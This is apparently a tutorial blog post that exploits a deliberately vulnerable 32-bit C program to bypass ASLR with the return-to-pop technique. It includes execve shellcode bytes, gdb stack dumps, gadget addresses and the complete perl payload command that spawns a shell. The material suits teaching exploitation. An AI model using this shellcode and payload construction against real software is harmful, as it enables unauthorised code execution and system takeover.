Defeating ASLR: The Return-to-pop Method
30 Sep 2022
In this post, I launch an attack on a 32-bit Ubuntu 20.04 system against a simple userspace program with a buffer overflow vulnerability. The procedure presented here implements a stack juggling method called “return-to-pop” [1]. The exploit aims to bypass Address Space Layout Randomization (ASLR) (/proc/sys/kernel/randomize_va_space defaults to “2”, which means full randomization) and gain shell access.
The Vulnerable Program
The ans_check.c program uses strcpy() to copy the user-specified string into a buffer with a 34-byte capacity, and then compares it with “forty-two”:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_answer(char *ans) {
    int ans_flag = 0;
    char ans_buf[34];
    printf("ans_buf is at address %p\n", &ans_buf);
    strcpy(ans_buf, ans);
    if (strcmp(ans_buf, "forty-two") == 0)
        ans_flag = 1;
    return ans_flag;
}
int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <answer>\n", argv[0]);
        exit(0);
    }
    if (check_answer(argv[1])) {
        printf("Right answer!\n");
    } else {
        printf("Wrong answer!\n");
    }
    printf("About to exit!\n");
    fflush(stdout);
    /* system("/bin/sh"); // used for NX exploration */
}
Compile the program with the following options:
gcc -g -m32 -no-pie -z execstack -fno-stack-protector ans_check.c -o ans_check
We just turned off PIE, NX, and StackGuard protections while leaving ASLR enabled. If we run the program multiple times, we see a different start address of ans_buf printed each time. To construct an effective payload, we need a fixed memory address that the program can return to. Fortunately, because the binary is not position-independent, its own code, including the main() function, meets our need. To verify this, use this simple program, find_main.c:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
    printf("%p\n", main);
    return 0;
}
which gives the start address of main(). Compile it with the command:
gcc -m32 -no-pie -o find_main find_main.c
After executing it several times, we should notice that the address does not change. On my system, the start address of main() is 0x08049196.
The Exploitation Payload
Our payload has three logical components: the first is a sequence of instructions (shellcode) whose execution gives us a shell; the second is safe padding made of addresses that contain a ret instruction; the third is the address of a pop-ret instruction sequence. In Kotler’s words:
“The purpose of ret will be somewhat similar to a NOP with a tweak, as each ret performs a pop action and increase %esp by four bytes, and then afterward jumps the next one.”
If all our handcrafted addresses start at four-byte aligned memory addresses, then, given that strings in C are NUL-terminated, strcpy() also writes a terminating “\x00” byte into the stack word immediately following the address of our final pop-ret sequence, which contaminates that word. The pop instruction removes the contaminated word from the stack and lets the last ret jump to the next word, a potential return address that leads to our shellcode. Our ideal payload looks like this:
./ans_check $(perl -e 'print "\x90"xA, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "{&ret}"xB, "{&pop-ret}"')
where the value of B is determined by the offset between the start address of ans_buf and the address we are returning to, and the value of A is chosen so that the addresses that follow the shellcode land on four-byte boundaries.
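To make the stack walk concrete, here is a minimal sketch in C that models the overwritten stack as an array of 32-bit words and follows the chain of ret and pop-ret steps described above. The two gadget addresses are the ones found with objdump later in this post; the function name simulate_chain and the model itself are only an illustration and are not part of the exploit.

```c
#include <stddef.h>
#include <stdint.h>

#define RET_GADGET     0x0804935du  /* address of a lone ret (value from this post) */
#define POP_RET_GADGET 0x08049022u  /* address of pop %ebx; ret (value from this post) */

/*
 * Follows the return chain over a model stack.
 * stack[0] is the word sitting in the saved-return-address slot.
 * Returns the address where execution finally lands.
 */
uint32_t simulate_chain(const uint32_t *stack, size_t len)
{
    size_t sp = 0;              /* index of the word %esp points to */
    uint32_t eip = RET_GADGET;  /* the function epilogue starts with a ret */

    while (sp < len) {
        if (eip == RET_GADGET) {
            eip = stack[sp++];  /* ret: pop the next word into %eip */
        } else if (eip == POP_RET_GADGET) {
            sp++;               /* pop %ebx: discard the contaminated word */
            if (sp >= len)
                break;
            eip = stack[sp++];  /* ret: jump to the word after it */
        } else {
            break;              /* left the gadgets: this is the final target */
        }
    }
    return eip;
}
```

For a model stack that holds three copies of the ret address, the pop-ret address, one contaminated word, and then the pointer 0xffffd7f5, the function returns 0xffffd7f5: every ret consumes one word, and the single pop skips exactly the word damaged by the terminating zero byte.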
What role does the first component (shellcode) play here? If we disassemble these bytes for the i386 architecture (the -m i386 option) and dump the assembly code, we may get:
31 c0 xor %eax,%eax
50 push %eax
68 2f 2f 73 68 push $0x68732f2f
68 2f 62 69 6e push $0x6e69622f
89 e3 mov %esp,%ebx
50 push %eax
89 e2 mov %esp,%edx
53 push %ebx
89 e1 mov %esp,%ecx
b0 0b mov $0xb,%al
cd 80 int $0x80
The first line sets %eax to zero and the second line pushes it onto the stack. The byte sequence \x2f\x2f\x73\x68 is the string “//sh” and the byte sequence \x2f\x62\x69\x6e is the string “/bin”. The first five lines combined let %ebx point to the head of a NULL-terminated string, “/bin//sh\0”. The next four lines build the remaining arguments: %edx points to a zero word (an empty environment), and %ecx points to a two-entry array that holds the address of the string followed by NULL. Note that the instruction mov $0xb,%al sets the lower eight bits of the %eax register; 11 is the syscall number of execve(). Thus, the shellcode runs as a call to execve("/bin//sh", argv, envp), where argv is {"/bin//sh", NULL} and envp is empty.
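The way the two push instructions assemble the path string can be checked with a small sketch in C. It reconstructs the bytes that a sequence of 32-bit pushes leaves in memory on a little-endian machine whose stack grows downward; the function name pushed_words_to_bytes is hypothetical and chosen for this illustration only.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * pushed[] lists the 32-bit values in the order they were pushed.
 * out receives 4 * count bytes as they appear in memory, lowest address first.
 * The last value pushed ends up at the lowest address, and each value is
 * stored least significant byte first (little-endian).
 */
void pushed_words_to_bytes(const uint32_t *pushed, size_t count, unsigned char *out)
{
    for (size_t i = 0; i < count; i++) {
        uint32_t word = pushed[count - 1 - i];
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (unsigned char)(word >> (8 * b));
    }
}
```

Feeding it the three values pushed by the shellcode, 0x00000000, 0x68732f2f and 0x6e69622f, in that order yields the bytes of “/bin//sh” followed by four zero bytes, which is the string %ebx points to.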
Find the Offset
A pointer to our input string is passed to the function check_answer, which means that the address of our input string is pushed onto the stack before check_answer is called. Issuing the command:
objdump -D ans_check | less
we can find three consecutive instructions: the one that pushes the pointer to our input string onto the stack, the call to check_answer, and the instruction that follows the call, whose address is the return address pushed onto the stack when the call instruction executes:
80492f6: 50 push %eax
80492f7: e8 3a ff ff ff call 8049236 <check_answer>
80492fc: 83 c4 10 add $0x10,%esp
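The relation between the three instructions above can be verified with a little arithmetic, sketched here in C. A near call with opcode e8 is five bytes long and its 32-bit operand is relative to the address of the next instruction; the helper names call_return_address and call_target are made up for this illustration.

```c
#include <stdint.h>

/* Address of the instruction after a 5-byte call (opcode e8 + rel32). */
uint32_t call_return_address(uint32_t call_addr)
{
    return call_addr + 5u;
}

/*
 * Target of the call. rel32 is the little-endian operand read as an
 * unsigned value; unsigned wraparound makes a negative displacement
 * such as 0xffffff3a work without signed arithmetic.
 */
uint32_t call_target(uint32_t call_addr, uint32_t rel32)
{
    return call_return_address(call_addr) + rel32;
}
```

With the call at 0x80492f7 and the operand bytes 3a ff ff ff (0xffffff3a), the return address is 0x80492fc and the target is 0x8049236, which matches the listing.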
Use the following commands to examine the stack. The breakpoint in gdb should be set at the call to strcpy():
$ gdb -q ans_check
(gdb) break 12
(gdb) run test
(gdb) x/72xw $esp
This is what I got:
gdb-peda$ break 12
Breakpoint 1 at 0x8049269: file ans_check.c, line 12.
gdb-peda$ run test
Starting program: /home/seed/Documents/return2x/ans_check test
ans_buf is at address 0xffffd58a
[----------------------------------registers-----------------------------------]
EAX: 0x21 ('!')
EBX: 0x804c000 --> 0x804bf10 --> 0x1
ECX: 0x0
EDX: 0x804a021 --> 0x726f6600 ('')
ESI: 0xf7faa000 --> 0x1e7d6c
EDI: 0xf7faa000 --> 0x1e7d6c
EBP: 0xffffd5b8 --> 0xffffd5d8 --> 0x0
ESP: 0xffffd580 --> 0x0
EIP: 0x8049269 (<check_answer+51>: sub esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8049260 <check_answer+42>: push eax
0x8049261 <check_answer+43>: call 0x80490c0 <printf@plt>
0x8049266 <check_answer+48>: add esp,0x10
=> 0x8049269 <check_answer+51>: sub esp,0x8
0x804926c <check_answer+54>: push DWORD PTR [ebp+0x8]
0x804926f <check_answer+57>: lea eax,[ebp-0x2e]
0x8049272 <check_answer+60>: push eax
0x8049273 <check_answer+61>: call 0x80490e0 <strcpy@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd580 --> 0x0
0004| 0xffffd584 --> 0x534
0008| 0xffffd588 --> 0x55 ('U')
0012| 0xffffd58c --> 0xf7fa8224 --> 0xf7f31e90 --> 0xfb1e0ff3
0016| 0xffffd590 --> 0x0
0020| 0xffffd594 --> 0xf7faa000 --> 0x1e7d6c
0024| 0xffffd598 --> 0xf7ffc7e0 --> 0x0
0028| 0xffffd59c --> 0xf7fad4e8 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, check_answer (ans=0xffffd7f5 "test") at ans_check.c:12
12 strcpy(ans_buf, ans);
gdb-peda$ x/72xw $esp
0xffffd580: 0x00000000 0x00000534 0x00000055 0xf7fa8224
0xffffd590: 0x00000000 0xf7faa000 0xf7ffc7e0 0xf7fad4e8
0xffffd5a0: 0xf7faa000 0xf7fe22d0 0x00000000 0x00000000
0xffffd5b0: 0xf7faa3fc 0x0804c000 0xffffd5d8 0x080492fc
0xffffd5c0: 0xffffd7f5 0xffffd684 0xffffd690 0x080492bc
0xffffd5d0: 0xffffd5f0 0x00000000 0x00000000 0xf7ddcee5
0xffffd5e0: 0xf7faa000 0xf7faa000 0x00000000 0xf7ddcee5
0xffffd5f0: 0x00000002 0xffffd684 0xffffd690 0xffffd614
0xffffd600: 0xf7faa000 0x00000000 0xffffd668 0x00000000
0xffffd610: 0xf7ffd000 0x00000000 0xf7faa000 0xf7faa000
0xffffd620: 0x00000000 0x8337981a 0xc7013e0a 0x00000000
0xffffd630: 0x00000000 0x00000000 0x00000002 0x08049120
0xffffd640: 0x00000000 0xf7fe7ad4 0xf7fe22d0 0x0804c000
0xffffd650: 0x00000002 0x08049120 0x00000000 0x08049156
0xffffd660: 0x080492a4 0x00000002 0xffffd684 0x08049360
0xffffd670: 0x080493d0 0xf7fe22d0 0xffffd67c 0x0000001c
0xffffd680: 0x00000002 0xffffd7cc 0xffffd7f5 0x00000000
0xffffd690: 0xffffd7fa 0xffffd80a 0xffffd818 0xffffd836
There are several addresses we are particularly interested in:
0xffffd580: 0x00000000 0x00000534 0x00000055 0xf7fa8224 (ans_buf start address)
0xffffd590: 0x00000000 0xf7faa000 0xf7ffc7e0 0xf7fad4e8
0xffffd5a0: 0xf7faa000 0xf7fe22d0 0x00000000 0x00000000
0xffffd5b0: 0xf7faa3fc 0x0804c000 0xffffd5d8 0x080492fc (return address for check_answer)
0xffffd5c0: 0xffffd7f5 0xffffd684 0xffffd690 0x080492bc (first argument of check_answer)
......
0xffffd680: 0x00000002 0xffffd7cc 0xffffd7f5 0x00000000 (higher address of our input string)
......
0xffffd7f0: 0x366b6365 0x73657400 0x48530074 0x3d4c4c45 ("test")
We should notice that the offset between the start address of ans_buf and the higher-addressed copy of the pointer to our input string “test” (the argv[1] entry at 0xffffd688) is 0xffffd688 - 0xffffd58a = 0xfe = 254 bytes.
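The same subtraction also tells us how far the saved return address of check_answer is from the buffer. A minimal sketch in C, using the addresses from the gdb session above (they change on every run under ASLR, but their differences do not); the function name stack_offset is only illustrative.

```c
#include <stdint.h>

/* Distance in bytes from the start of a buffer to a higher stack slot. */
uint32_t stack_offset(uint32_t buf_addr, uint32_t slot_addr)
{
    return slot_addr - buf_addr;
}
```

In the session above, stack_offset(0xffffd58a, 0xffffd5bc) gives 50 bytes to the saved return address, and stack_offset(0xffffd58a, 0xffffd688) gives the 254 bytes to the pointer to our input string.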
Construct the Payload
Next, let’s find the addresses of ret and pop-ret using objdump:
804935d: c3 ret
$ objdump -D ans_check | grep -B3 ret | grep -A1 pop
8049022: 5b pop %ebx
8049023: c3 ret
--
8049358: 5b pop %ebx
8049359: 5d pop %ebp
804935a: 8d 61 fc lea -0x4(%ecx),%esp
--
80493c1: 5e pop %esi
80493c2: 5f pop %edi
80493c3: 5d pop %ebp
80493c4: c3 ret
--
80493f2: 5b pop %ebx
80493f3: c3 ret
We shall choose a pop instruction that uses %ebx; popping into other registers like %edi or %ebp can have other effects.
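Two practical details apply when a chosen address goes into the payload: it is written in little-endian byte order, and it must not contain a zero byte, because strcpy() stops copying at the first “\x00”. The sketch below, in C, shows both checks; encode_le32 and has_nul_byte are hypothetical helper names used only for this illustration.

```c
#include <stdint.h>

/* Writes a 32-bit address as four bytes, least significant byte first. */
void encode_le32(uint32_t addr, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(addr >> (8 * i));
}

/* Returns 1 if any of the four bytes of addr is zero, otherwise 0. */
int has_nul_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}
```

For the ret at 0x0804935d this gives the bytes 5d 93 04 08, and for the pop-ret at 0x08049022 it gives 22 90 04 08; neither address contains a zero byte, so both survive strcpy().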
Now we have the address of a ret instruction as well as the address of a pop-ret sequence. We would like the length of our payload to be 250 bytes: the address of the pop-ret sequence then occupies the stack word eight bytes below the pointer to the input string, the terminating “\x00” byte lands in the word four bytes below that pointer, and the pointer itself stays intact. Moreover, the addresses in the payload must land on four-byte aligned stack words, while the buffer starts two bytes past a four-byte boundary and the shellcode is 25 bytes long, so we pad the payload with five NOP bytes (2 + 5 + 25 = 32, a multiple of four). The remaining 250 - 5 - 25 - 4 = 216 bytes hold 54 copies of the address of ret. The constructed payload is shown below:
$ ./ans_check $(perl -e 'print "\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
It successfully obtains the shell:
$ ./ans_check $(perl -e 'print "\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
ans_buf is at address 0xffe7f4da
$ whoami
seed
$ id
uid=1001(seed) gid=1001(seed) groups=1001(seed),120(docker)
Actually, our exploit also works if the five NOP bytes are placed between the shellcode and the addresses of ret:
$ ./ans_check $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x5, "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
ans_buf is at address 0xffe2999a
$ whoami
seed
$ id
uid=1001(seed) gid=1001(seed) groups=1001(seed),120(docker)
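The numbers used in both payloads (5 NOP bytes, 25 shellcode bytes, 54 ret addresses) can be checked against the stack layout with a short sketch in C. It takes the addresses observed in the gdb session as inputs; the function name layout_is_valid and its parameter names are made up for this illustration.

```c
#include <stdint.h>

/*
 * Checks a payload of the form
 *   NOPs + shellcode + rets copies of the ret address + pop-ret address.
 * Returns 1 if every address lands on an aligned word, the saved return
 * address is overwritten by one of the addresses, and the word after the
 * contaminated one is the pointer to the input string; otherwise 0.
 */
int layout_is_valid(uint32_t buf, unsigned nops, unsigned shellcode_len,
                    unsigned rets, uint32_t saved_ret_slot, uint32_t argv1_slot)
{
    uint32_t sled = buf + nops + shellcode_len; /* first ret address word */
    uint32_t pop_ret = sled + 4u * rets;        /* pop-ret address word */

    if (sled % 4u != 0)
        return 0;                               /* addresses misaligned */
    if (sled > saved_ret_slot || saved_ret_slot > pop_ret)
        return 0;                               /* return address not covered */
    /* pop_ret + 4 receives the terminating zero byte; pop_ret + 8 is used. */
    return pop_ret + 8u == argv1_slot;
}
```

With buf = 0xffffd58a, the saved return address at 0xffffd5bc and the pointer to the input string at 0xffffd688, the layout with 5 NOPs and 54 ret addresses passes the check, as does 1 NOP with 55 ret addresses, while 2 NOPs with 54 ret addresses fails the alignment test.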
Notes
[1] See Izik Kotler, “Smack the Stack (Advanced Buffer Overflow Methods)”, in Proceedings of 22C3, 2005.